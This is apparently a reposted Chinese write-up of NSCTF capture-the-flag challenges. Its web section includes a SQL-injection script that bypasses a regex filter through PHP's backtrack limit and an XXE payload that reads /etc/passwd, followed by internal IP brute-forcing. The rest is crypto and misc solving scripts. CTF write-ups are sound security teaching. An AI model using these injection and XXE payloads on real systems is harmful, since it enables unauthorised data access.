文章目錄

• • Web-xff
  • Web-sql
  • Web-XXE
  • CRYPTO-神算子
  • CRYPTO-Catch_the_point
  • CRYPTO-data
  • MISC-docx
  • MISC-BBQ
  • MISC-等等我

前言：這是最近做的一部分NSCTF題目的解題思路和方法

Web-xff

方法一：



方法二：

Web-sql

解題思路：

（1）dirsearch掃出備份文件

（2）分析文件
分析index.php文件：

<?phprequire("conf/config.php");if (isset($_REQUEST['id'])) { $id = $_REQUEST['id'];if (preg_match("/\d.+?\D.+/is",$id)){#.：除換行符以外的所有字符 \d：匹配數字 ?：0次或1次匹配 \D：匹配非數字 /is：不區分大寫小寫匹配所有字符 該正則為非貪婪模式 die("Attack detected");}$query = "SELECT text from UserInfo WHERE id = " . $id. ";"; $results = $conn->query($query);echo "學號：" . $id . "，成績為： ".$results->fetch_assoc()['text'];} ?>

利用PHP的pcre.backtrack_limit限制來繞過waf

可參考相關文章https://www.freebuf.com/articles/web/190794.html
繞過腳本：

import requestsreq=requests.post('http://47.96.38.46:8888/index.php', data={'id': '4'*1000001 + ' and false union/**/select flag from flag'}) print(req.text)

Web-XXE

根據下圖所示：猜測存在XXE

（1）使用XXE Payload讀取文件測試

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <user>&xxe;</user> </root>

（2）訪問hosts敏感文件：

（3）根據提示訪問內網：

發現并沒有什么信息
（4）爆破該段IP

CRYPTO-神算子

打開文件如下

一副地圖上寫有如下數字，您可以發現什么嗎？n: 20499421483319837632829005665244953604816631094131482091599739242452461959670789327098587429656441009883765163931516947567316643569963621519243386576155541991650610105070387440479691299670503655019032377026089584152047162143622592606512093871068907193787013919967475201572411584456318069752118161110853731611597336602111728937901380008855876406951363681839727114631417566905375167058609392654378267988132283758536576123045237315624774544667706040426027925497245266590365080287798629911056879889563806490213919247917120199512548392006107613124668838850719777385822083736801474373012496703900585089950184532462833403107 e: 1042636303 c: 6205969032572882944180037263485628042378109193231715841886325949891749121989383547311929536212318170181549797555571944086768516630484986629344776433491100379930382523336990408172935057555487257649213769795574519116916319036030006483308024908136953009371319354721896420570456481836312073933269140937680349037921322912348206694899177135333409955744817247592349628482968931648273511891069736279124128933389566829376343402718480194054908196812812160453258979720636049495124819945003585505986465000415005397725594114641049377535161026102542833547952325294693461360521848141377345684282000046607100551138063210737261256317

將n分解p、q

根據p、q、e、c解flag

import gmpy2 from libnum import n2s,s2nn=20499421483319837632829005665244953604816631094131482091599739242452461959670789327098587429656441009883765163931516947567316643569963621519243386576155541991650610105070387440479691299670503655019032377026089584152047162143622592606512093871068907193787013919967475201572411584456318069752118161110853731611597336602111728937901380008855876406951363681839727114631417566905375167058609392654378267988132283758536576123045237315624774544667706040426027925497245266590365080287798629911056879889563806490213919247917120199512548392006107613124668838850719777385822083736801474373012496703900585089950184532462833403107 e=1042636303 c=6205969032572882944180037263485628042378109193231715841886325949891749121989383547311929536212318170181549797555571944086768516630484986629344776433491100379930382523336990408172935057555487257649213769795574519116916319036030006483308024908136953009371319354721896420570456481836312073933269140937680349037921322912348206694899177135333409955744817247592349628482968931648273511891069736279124128933389566829376343402718480194054908196812812160453258979720636049495124819945003585505986465000415005397725594114641049377535161026102542833547952325294693461360521848141377345684282000046607100551138063210737261256317 p=138149558149136946723702853693217798862267316666189942816520886165357260194916654034965226246613620482905011306996465659544456451870958162107819485799987144997514278358234816986266518092303586753050671210149075296173319503677929313696499057977134617244449388706566611756401925702906820026584248278446237580517 q=148385718767120808294577062519850184639495614793281052895346144216250114087102888222369065569059037636249358547628359333320754976046188817562335343752474101985879697854111246597090633214354135620808419945688374075276767391174302507279227429182436807739268769378015447834458981548109968262808179707802448799271 p =gmpy2.mpz(p) q =gmpy2.mpz(q) e =gmpy2.mpz(e) phi_n= (p - 1) * (q - 1) d = gmpy2.invert(e, phi_n) print n2s(pow(int(c),d,n)).decode('utf-8')

CRYPTO-Catch_the_point

題目：
鏈接：https://pan.baidu.com/s/10QZcH99pfRXS-3H9Bh_zuQ
提取碼：rpdk
直接在https://sagecell.sagemath.org/用腳本解

from sage import * p = 16496037227337470707 R=IntegerModRing(p) gx=R(3361984281888091942) gy=R(9881897088122670838) rx=R(1) ry=R(12352989693655963935) a=R((gy*gy - gx*gx*gx)/gx) b=R(gy^2 - gx^3 - a*gx) print ("a=%d" %int(a)) print ("b=%d" %int(b)) a=R((ry*ry - rx*rx*rx)/rx) b=R(ry^2 - rx^3 - a*rx) print ("a=%d" %int(a)) print ("b=%d" %int(b)) E=EllipticCurve(GF(p),[a,b]) phi=E.cardinality() print ("phi=%d" %int(phi)) print (factor(phi)) G = E(gx, gy) R = E(rx, ry) e= 3 k = inverse_mod(e, phi) F = k*(R-G) (x,y,z) = F print (F) print ("\nCatch The Point, the flag is:\n") flag = "flag{"+str(x)+str(y)+"}" print ("%s\n" %flag)

CRYPTO-data

題目：
鏈接：https://pan.baidu.com/s/139Svb8aOrT5h5myuqWWIFA
提取碼：9cuy
直接使用腳本即可，注意input.txt.encrypted需要和腳本在同一目錄下

import binascii import sysdef xor(data,key):return bytes([x ^ key[i%len(key)] for i, x in enumerate(data)])p1 = binascii.hexlify('have a g') p2 = binascii.hexlify('ood time') f = file('input.txt.encrypted','rb').read()c = f.encode('hex')# key = C1 ^ C2 ^ P2 print c[:32] key = int(c[:16],16)^int(c[16:32],16)^int(p2,16) #key = int('d8c269fd73fde245',16) print hex(key) # iv = C1 ^ K ^ P1 iv = int(c[:16],16)^key^int(p1,16) #iv = int('7f378206d0cf6794',16) print hex(iv)flag = "" for i in range(0,len(c),16):solve = int(c[i:i+16],16)^key^iviv = int(c[i:i+16],16)flag += str(hex(solve))[2:-1]#print flag print flag.decode('hex')

MISC-docx

題目：
鏈接：https://pan.baidu.com/s/1-twukXkDrxtbtCpvjgJS-A
提取碼：gpb0

打開1.CTF.docx，如下所示

將后綴修改為zip/7z，在theme.xml中找到flag

MISC-BBQ

題目：
鏈接：https://pan.baidu.com/s/1r-2u33XTBVLlpjPPxiGwjA
提取碼：35it

這是一道base64隱寫題目
先將密文進行一次base64解密，將解密的內容保存為1.txt
再使用腳本解密

import base64def deStego(stegoFile):b64table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"with open(stegoFile, 'r') as stegoText:message = ""for line in stegoText:try:text = line[line.index("=") - 1:-1]message += "".join([bin(0 if i == '=' else b64table.find(i))[2:].zfill(6) for i in text])[6 - 2 * text.count('='):6]except:passreturn "".join([chr(int(message[i:i + 8], 2)) for i in range(0, len(message), 8)])print(deStego("1.txt")) #注1.txt和腳本在同一目錄下

MISC-等等我

題目：

hHGkn82kgEmlJ8mBUJGgXM32gEnFA90AYIWlHA2kg6mlJ8mBUIGoXB2kg6mFG h93AkH0lGI36hAZ-E9H7EJ+dB8mBUIWlGI36hAZ-G9H7EI0knB2kg6mFH8mBU hJGgXA2kg6mFJ8mAcImgXM3If6q-G937EI0kn83Af6q-G0YogIZ-I8mBUIGom hI32hAZ-E91AcH0kX736gIZ-F92AoH0kn83Af6q-G9H7EI0l192kh6Z-E91Ac LImgX736890omI32gEnFA91AcJGgX73A+

解題思路：xxencode+uuencode
先在http://www.atoolbox.net/Tool.php?Id=780進行xxencode解密

然后在https://www.qqxiuzi.cn/bianma/uuencode.php進行uuencode解密

腳本解密：

m="12,235,05,0125,01234,035,0145,01234,3,25,05,4,023,25,25,015,013,05,4,015,23,05,023,0123,023,4,015,15,012,0123,125,123,025,023,4,0123,125,125,125,13" print "".join([chr(ord('A')+sum(2**int(j) for j in i)-1) for i in m.split(',')]) 創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的NSCTF-部分题目wp的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。